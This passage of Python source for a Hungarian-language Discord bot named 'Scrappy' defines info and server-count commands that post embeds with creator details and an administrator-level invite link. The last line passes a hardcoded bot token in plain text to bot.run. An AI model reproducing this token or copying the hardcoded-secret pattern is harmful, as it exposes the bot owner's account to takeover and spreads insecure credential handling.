        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( s!töröl )", color=discord.Colour.red())
        embed.add_field(name="Szükséges Jog:", value="manage_messages", inline=False) 
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
async def info(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Információk", description="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬", inline=False, color=discord.Colour.green())

    embed.add_field(name="Készitő:", value="Getdown", inline=False)

    embed.add_field(name="Készités Dátuma:", value="2020.03.16", inline=False)

    embed.add_field(name="Programnyelv:", value="Python", inline=False)

    embed.add_field(name="Elérhetőség:", value="ＧＥＴＤＯＷＮ#5271", inline=False)

    embed.add_field(name="Szerverek:", value="s!szerverek", inline=False)

    embed.add_field(name="Bot Meghivó:", value="[__`Katints ide`__](https://discordapp.com/api/oauth2/authorize?client_id=527505466453131264&permissions=8&scope=bot)", inline=False)

    embed.add_field(name="Support Szerver:", value="[__`Katints ide`__](https://discord.gg/SbgUgVU)", inline=False)

    embed.set_image(url='https://avatarfiles.alphacoders.com/865/thumb-86518.png')

    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")

    await ctx.send(embed=embed)

@bot.command()
async def szerverek(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Szerverek", description="▬▬▬▬▬", color=discord.Colour.green())
    embed.add_field(name="Szerverek:", value=f"{len(bot.guilds)}")
    embed.set_footer(text="▬▬▬▬▬▬")
    embed.set_author(name=ctx.message.author, icon_url=ctx.message.author.avatar_url)
    await ctx.send(embed=embed)

bot.run ("NjkwNjI3MTQyMzc1MTc4MzQx.XnXRkw.xDy2k4qTKNNrml_E1qO3q_Fxpek")
